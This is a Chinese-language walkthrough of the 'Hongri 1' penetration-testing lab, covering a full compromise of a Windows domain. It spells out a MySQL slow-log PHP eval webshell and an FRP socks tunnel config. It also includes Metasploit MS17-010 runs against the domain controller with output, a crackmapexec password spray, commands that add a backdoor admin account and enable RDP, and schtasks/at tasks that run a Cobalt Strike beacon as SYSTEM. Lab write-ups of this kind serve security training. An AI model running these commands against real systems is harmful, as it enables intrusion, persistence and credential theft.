红日靶场1

红日靶场1

靶场配置

红日1共有三台主机,配置如下:

​​​​​​image​​​​​​

信息收集

发现外围主机是禁Pin的,使用fscan扫描需要带上np参数

image

有3306和80服务,扫一下目录

image

发现一个phpMyadmin,访问看看

getshell外围机

弱口令root/root可以进后台:

image

这里就直接利用慢日志写shell了

show variables like '%slow_query_log%';  
set global slow_query_log=1; 开启慢查询
set global slow_query_log_file='C:\\phpStudy\\WWW\\shell.php'; 设置写shell路径
select '<?php @eval($_POST[1]);?>' or sleep(11); sleep时间要超过最大限制才生效

之后直接利用蚁剑连接即可:

image

内网渗透

ipconfig探测一下内网信息:

C:\phpStudy\WWW> ipconfig
Windows IP 配置
以太网适配器 本地连接 5:
   连接特定的 DNS 后缀 . . . . . . . : localdomain
   本地链接 IPv6 地址. . . . . . . . : fe80::9534:7b0c:21aa:e840%26
   IPv4 地址 . . . . . . . . . . . . : 192.168.120.131
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 192.168.120.2
以太网适配器 本地连接 3:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
以太网适配器 本地连接 2:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
以太网适配器 Bluetooth 网络连接:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
以太网适配器 本地连接:
   连接特定的 DNS 后缀 . . . . . . . : 
   本地链接 IPv6 地址. . . . . . . . : fe80::b022:79c6:8704:ef83%11
   IPv4 地址 . . . . . . . . . . . . : 192.168.52.143
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 192.168.52.2

看一下杀软:

image

发现这台机器没有杀软

直接上fscan开扫:

start infoscan
(icmp) Target 192.168.52.143  is alive
(icmp) Target 192.168.52.138  is alive
(icmp) Target 192.168.52.141  is alive
[*] Icmp alive hosts len is: 3
192.168.52.141:445 open
192.168.52.138:445 open
192.168.52.141:7002 open
192.168.52.138:88 open
192.168.52.141:7001 open
192.168.52.143:3306 open
192.168.52.143:445 open
192.168.52.141:139 open
192.168.52.138:139 open
192.168.52.141:135 open
192.168.52.143:139 open
192.168.52.138:135 open
192.168.52.143:135 open
192.168.52.138:80 open
192.168.52.143:80 open
192.168.52.141:21 open
192.168.52.141:8099 open
192.168.52.141:8098 open
[*] alive ports len is: 18
start vulscan
[*] NetInfo:
[*]192.168.52.143
   [->]stu1
   [->]192.168.52.143
   [->]192.168.120.131
   [->]169.254.129.186
[+] 192.168.52.143	MS17-010	(Windows 7 Professional 7601 Service Pack 1)
[*] NetInfo:
[*]192.168.52.138
   [->]owa
   [->]192.168.52.138
[*] NetBios: 192.168.52.143  stu1.god.org                        Windows 7 Professional 7601 Service Pack 1 
[+] 192.168.52.138	MS17-010	(Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
[*] NetBios: 192.168.52.138  [+]DC owa.god.org                   Windows Server 2008 R2 Datacenter 7601 Service Pack 1 
[*] NetInfo:
[*]192.168.52.141
   [->]root-tvi862ubeh
   [->]192.168.52.141
[*] WebTitle: http://192.168.52.141:7002 code:200 len:2632   title:Sentinel Keys License Monitor
[*] WebTitle: http://192.168.52.138     code:200 len:689    title:IIS7
[+] 192.168.52.141	MS17-010	(Windows Server 2003 3790)
[*] WebTitle: http://192.168.52.141:8099 code:403 len:1409   title:The page must be viewed over a secure channel
[+] ftp://192.168.52.141:21:anonymous 
[*] WebTitle: http://192.168.52.143     code:200 len:14749  title:phpStudy 探针 2014

额,有点无语住了,怎么全是MS17-010,那还有啥意义

算了,先打打试试看吧

挂个FRP代理(Releases · fatedier/frp (github.com)),Server:(frps.ini)

[common]
## 一、服务器的基本配置部分
## 7000 是FRP服务端口,可以改
bind_port = 7000
## dashboard_user和dashboard_pwd是FRP网页版管理员用户名密码,可以改。
dashboard_user = admin
dashboard_pwd = frpadmin@2022
## 7500 是网页版管理端口:可以通过 http://服务器ip:7500登陆
dashboard_port = 25500
## 服务器和客户机之间的心跳连接
heartbeat_timeout = 30
#token设置,需要和客户端一致,客户端与服务端通过token进行认证,建议满足复杂度要求
token=frpToken@admin2022

这个本地执行

frps.exe -c frps.ini

Client:(frpc.ini)

[common]
server_addr = 192.168.251.1
server_port = 7000
token = frpToken@admin2022


[proxy]
type = tcp
plugin = socks5
remote_port = 25599

这个传到Win7执行:

frpc.exe -c frpc.ini

MS17010域控打法

use auxiliary/admin/smb/ms17_010_command
set rhosts 192.168.52.138 192.168.52.141
set command tasklist
show options
run

MS17-010直接打穿了:

msf6 auxiliary(admin/smb/ms17_010_command) > run
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain  ...  192.168.120.1:25599  ...  192.168.52.138:445  ...  OK

[*] 192.168.52.138:445    - Target OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1
[*] 192.168.52.138:445    - Built a write-what-where primitive...
[+] 192.168.52.138:445    - Overwrite complete... SYSTEM session obtained!
[+] 192.168.52.138:445    - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.52.138:445    - Getting the command output...
[*] 192.168.52.138:445    - Executing cleanup...
[+] 192.168.52.138:445    - Cleanup was successful
[+] 192.168.52.138:445    - Command completed successfully!
[*] 192.168.52.138:445    - Output for "ipconfig":


Windows IP ����


���������� ��������:

   �����ض��� DNS ��׺ . . . . . . . : 
   �������� IPv6 ��. . . . . . . . : fe80::b84d:95ca:b6b3:6ddf%11
   IPv4 �� . . . . . . . . . . . . : 192.168.52.138
   ��������  . . . . . . . . . . . . : 255.255.255.0
   Ĭ������. . . . . . . . . . . . . : 192.168.52.2

���������� isatap.{D7C92CB6-1939-46AC-85CE-50401CEC5056}:

   ý��״  . . . . . . . . . . . . : ý���ѶϿ�
   �����ض��� DNS ��׺ . . . . . . . : 


[*] Scanned 1 of 2 hosts (50% complete)
[proxychains] Strict chain  ...  192.168.120.1:25599  ...  192.168.52.141:445  ...  OK
[*] 192.168.52.141:445    - Target OS: Windows Server 2003 3790
[*] 192.168.52.141:445    - Filling barrel with fish... done
[*] 192.168.52.141:445    - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.52.141:445    -     [*] Preparing dynamite...
[*] 192.168.52.141:445    -             Trying stick 1 (x64)...Miss
[*] 192.168.52.141:445    -             [*] Trying stick 2 (x86)...Boom!
[*] 192.168.52.141:445    -     [+] Successfully Leaked Transaction!
[*] 192.168.52.141:445    -     [+] Successfully caught Fish-in-a-barrel
[*] 192.168.52.141:445    - <---------------- | Leaving Danger Zone | ---------------->
[*] 192.168.52.141:445    - Reading from CONNECTION struct at: 0x8d463d60
[*] 192.168.52.141:445    - Built a write-what-where primitive...
[+] 192.168.52.141:445    - Overwrite complete... SYSTEM session obtained!
[+] 192.168.52.141:445    - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.52.141:445    - Getting the command output...
[*] 192.168.52.141:445    - Executing cleanup...
[+] 192.168.52.141:445    - Cleanup was successful
[+] 192.168.52.141:445    - Command completed successfully!
[*] 192.168.52.141:445    - Output for "ipconfig":


Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   IP Address. . . . . . . . . . . . : 192.168.52.141
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.52.2


[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16

计划任务域控打法

这里我们走CS去看看,先上线

Listen配置如图:

image

再配置一个exe木马:

image

因为没有杀软限制,这里不用做免杀

image

上线之后我们考虑如何做横向移动

Win7可以考虑抓密码:

image

这里可以看到是qwe123!@#

密码碰撞

利用qwe123!@#​做密码碰撞

proxychains -q crackmapexec smb 192.168.52.1/24 -u 'administrator' -p 'qwe123!@#

因为我这里设置问题,三台都设置了一样的,所以三台都通了

image

接下来我们就使用IPC进行横向了

IPC横向

IPC横向思路:

定时任务at,计划任务schtasks,创建.bat执行命令或者.exe上线(at命令在2008R2之后启用了,还是用schtasks好点)

计划任务schtasks演示

这里有两种做法,先建立IPC连接然后创建计划任务或者直接创建计划任务

创建IPC连接

工作组环境:

net use \\192.168.xx.xx\ipc$ "password" /user:"administrator"

域内环境:

net use \\192.168.xx.xx\ipc$ "password" /user:xxx.com\"administrator"

image

建立成功可以使用net use​查看连接情况

接下来我们需要使用net time查看目标主机的时间,因为目标主机的时间不一定是走的北京时间,有时候是根本没设置的乱序时间,以便后面我们创建定时任务的时候设定开始时间,不过这里使用计划任务可以忽略这一步

因为外围机器Win7开着防火墙,无法做代理转发到CS,所以我们添加用户,上Win7的桌面把防火墙关了

net user qingfeng qwer1234! /add
net localgroup administrators qingfeng /add
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

这里的RDP也只允许本地登录,所以我们挂个代理进去连接

先挂上FRP上面写过这里不赘述了

imageimage

添加远程桌面代理后直接连接,关掉防火墙

image

创建计划任务

schtasks /create /s 192.168.52.138 /tn backdoors /sc minute /mo 1  /tr c:\dc3.exe /ru system /f

image

成功上线

image

在没有建立ipc连接时,要加上/u和/p参数分别设置用户名和密码。

但也有些时候,由于当前权限或组策略设置等原因,该schtasks方法远程创建计划任务可能会报错拒绝访问,这时候也需要高权限的用户帐号密码:

schtasks /create /s 192.168.52.138 /u administrator /p qwe123!@# /tn backdoor /sc minute /mo 1 /tr c:\dc3.exe /ru system /f

另一台主机(2003)利用at上线

shell net use \\192.168.52.141 "qwe123!@#" /user:"administrator"
shell copy dc3.exe \\192.168.52.141\c$
shell net time
shell at \\192.168.52.141 19:40 C:\dc3.exe

我这里利用at上线有点问题,会报错:

image

这里的打法还是就用ms17010吧,实在打不通

挂上proxychains4,用msf打

记得生成一个32位的马,这里的2003是x86架构的

use auxiliary/admin/smb/ms17_010_command
set rhosts 192.168.164.156 192.168.164.161
set command C:\\beacon_x86.exe
show options
run

image

运行后成功上线:

image

至此打靶完成

image

PTH域控打法

可以利用Win7横向PTH

image

image

这里利用taowu的插件就可以横向了

image